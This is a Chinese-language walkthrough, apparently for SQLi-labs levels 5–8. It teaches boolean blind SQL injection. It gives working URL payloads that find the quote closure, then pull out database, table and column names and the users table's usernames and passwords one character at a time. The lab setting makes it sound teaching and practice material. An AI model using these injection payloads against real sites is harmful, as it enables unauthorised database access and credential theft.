目录

首先找到他们的闭合方式

操作

总结：

---

        第五关根据页面结果得知是字符型但是和前面四关还是不一样是因为页面虽然有东西。但是只有对于请求对错出现不一样页面其余的就没有了。这个时候我们用联合注入就没有用，因为联合注入是需要页面有回显位。如果数据 不显示只有对错页面显示我们可以选择布尔盲注。布尔盲注主要用到length(),ascii() ,substr()这三个函数，首先通过length()函数确定长度再通过另外两个确定具体字符是什么。布尔盲注向对于联合注入来说需要花费大量时间。

首先找到他们的闭合方式

        我们输入?id=1’发现报错，在后面加上注释符返回You are in,所以它的闭合方式就是用 ‘ 来闭合的，并且我们知道如果语句是对的，才返回You are in…，我们希望看到的内容并不会在页面上得到反馈了，就需要使用布尔盲注。

操作

?id=1'and length((select database()))>9--+
#大于号可以换成小于号或者等于号，主要是判断数据库的长度。lenfth()是获取当前数据库名的长度。如果数据库是haha那么length()就是4

?id=1'and ascii(substr((select database()),1,1))=115--+
#substr("78909",1,1)=7 substr(a,b,c)a是要截取的字符串，b是截取的位置，c是截取的长度。布尔盲注我们都是长度为1因为我们要一个个判断字符。ascii()是将截取的字符转换成对应的ascii吗，这样我们可以很好确定数字根据数字找到对应的字符。
 
 
?id=1'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+
判断所有表名字符长度。

?id=1'and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+
逐一判断表名
 
?id=1'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+
判断所有字段名的长度

?id=1'and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+
逐一判断字段名。
 
 
?id=1' and length((select group_concat(username,password) from users))>109--+
判断字段内容长度

?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50--+
逐一检测内容。

总结：

        布尔盲注就是先用length找到库，表，字段的长度，然后再用ascii和substr把这些东西真正的找出来

        第六关和第五关是差不多的，根据页面报错信息可以猜测id参数是双引号，只需将第五关的单引号换成双引号就可以了

        第七关当在输入id=1,页面显示you are in... 当我们输入id=1'时显示报错，但是没有报错信息，这和我们之前的关卡不一样，之前都有报错信息。当我们输入id=1"时显示正常所以我们可以断定参数id时单引号字符串。因为单引号破坏了他原有语法结构。然后我输入id=1'--+时报错，这时候我们可以输入id=1')--+发现依然报错，之时我试试是不是双括号输入id=1'))--+，发现页面显示正常。那么它的过关手法和前面就一样了选择布尔盲注就可以了。

        第八关和第五关一样就不多说了。只不过第八关没有报错信息，但是有you are in..进行参照。id参数是一个单引号字符串。